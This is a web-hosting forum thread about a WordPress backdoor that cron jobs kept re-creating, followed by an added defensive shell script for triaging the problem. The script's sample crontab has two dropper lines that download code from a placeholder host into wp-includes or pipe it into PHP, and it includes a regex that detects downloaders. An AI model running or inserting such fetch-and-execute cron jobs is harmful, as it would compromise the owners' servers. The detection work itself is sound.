Server infected, ImmunifyAV says SMW-BLKH-1485227-php.bkdr
When I run ImmunifyAV it says the file /home/.../public_html/wp-includes/options.php is infected by SMW-BLKH-1485227-php.bkdr. Google doesn't show any hits for it.
I can delete the file but if I refresh the folder it reappears again minutes later.
I have no idea how to find the running program that is creating this file and how to then remove it. I can attach the file if necessary, but don't want to get flagged for attaching an 'infected' file.
The cPanel Security Advisor scan shows everything as green and up to date.
Please advise on what further details I need to share so I can fix this.
Thanks.
Not sure why this was waiting approval for days. Anyway, I got assistance elsewhere so it's sorted now.
Hey there! Both myself and the backup technician that works forums ended up with the same days off, and Forums aren't usually staffed over the weekend, so that's why you had a longer-than-normal delay getting that approved. Can you post the resolution you found?
Ahhhhh, just bad timing. It started sending spam emails and I was contacted by my host informing me I had to resolve the issue immediately. Turned out there were several cron jobs which downloaded the infected files and copied them to the folder above. Removed all the tasks from the cron queue, deleted the injected files and it's showing as clean. I still have no idea how the server was infected in the first place, I always ensure the latest patches and plugins are installed. Not being able to quickly turn off outgoing mail was frustrating, an option to do so in cpanel would be useful for situations like this. I had to stop the mail processes and edit php.ini to disable the mail processes.
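The original question asked how to find what keeps recreating the file, and the resolution above was that cron jobs were re-downloading it. The script below is an added example for that triage, not code from anyone in this thread: it greps every cron source the account can read for dropper-style lines (downloaders, pipe-to-interpreter, writes into wp-includes), lists PHP files changed in the last few minutes so siblings dropped alongside options.php are found too, and checks whether php.ini's disable_functions already lists mail (the php.ini change described above). The sample crontab, the example.invalid URLs and the paths are constructed for illustration; the match pattern is a heuristic, so expect to review what it flags.

```sh
#!/bin/sh
# Added example, not code from the forum thread. Triage helpers for the
# "deleted file comes back minutes later" case: something scheduled is
# re-dropping it, and on shared hosting that is most often a cron entry.
# Sample crontab, example.invalid URLs and paths are constructed.

# Things that tend to appear in dropper cron lines: downloaders, a pipe into
# an interpreter, base64 payloads, or writes into the web root's core dirs.
# Heuristic only; review every hit by hand.
SUSPICIOUS_CRON_RE='curl|wget|base64|[|][[:space:]]*(sh|bash|php|perl)([[:space:]]|$)|/wp-includes/|/tmp/|/dev/shm/'

# flag_cron_lines: read crontab text on stdin, print non-comment lines that
# match SUSPICIOUS_CRON_RE. Exit status 0 if anything matched, 1 otherwise.
flag_cron_lines() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' | grep -E -- "$SUSPICIOUS_CRON_RE"
}

# collect_cron_text: gather every place a job can hide for the current user
# and, if readable, the system. On cPanel the user crontab is usually all
# a non-root account can see; unreadable files are skipped silently.
collect_cron_text() {
    crontab -l 2>/dev/null
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -r "$f" ] && { echo "# --- $f"; cat "$f"; }
    done
    return 0
}

# recent_php_files DIR MINUTES: PHP files under DIR modified in the last
# MINUTES minutes. Run it right after the file "reappears".
recent_php_files() {
    find "$1" -type f -name '*.php' -mmin "-$2" 2>/dev/null
}

# php_mail_disabled INI: true if disable_functions in INI lists mail
# (PHP's own directive; the last assignment in the file wins).
php_mail_disabled() {
    grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$1" 2>/dev/null \
        | tail -n 1 | sed 's/^[^=]*=//' | tr ',' '\n' | tr -d ' \t\r' | grep -qx 'mail'
}

# Constructed sample crontab: one legitimate job and two dropper-style jobs.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://example.invalid/o.txt -o /home/user/public_html/wp-includes/options.php
*/10 * * * * wget -q -O - http://example.invalid/p | php'

# count_flagged_sample: number of sample lines flagged (the two dropper jobs).
count_flagged_sample() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines | wc -l | tr -d ' '
}

if [ "${1:-}" = "--live" ]; then
    webroot="${2:-$HOME/public_html}"
    echo "== suspicious cron lines on this host =="
    collect_cron_text | flag_cron_lines || echo "(none matched)"
    echo "== PHP files changed in the last 15 min under $webroot =="
    recent_php_files "$webroot" 15
else
    echo "== sample crontab: flagged lines =="
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
fi
```

Run it with `--live /home/<user>/public_html` on the affected account; without arguments it just scans the built-in sample. If you have root and auditd, `auditctl -w /path/to/wp-includes/options.php -p wa -k wpdrop` followed by `ausearch -k wpdrop` after the next recreation names the writing process directly, which answers the "which program is creating this" question even when the source is not cron. Two caveats: removing the cron entries stops the re-download but does not remove whatever installed them (typically a web shell or compromised plugin), so the web root still needs a full review; and disabling mail() in php.ini only stops PHP's mail() path, not a script that opens an SMTP socket itself.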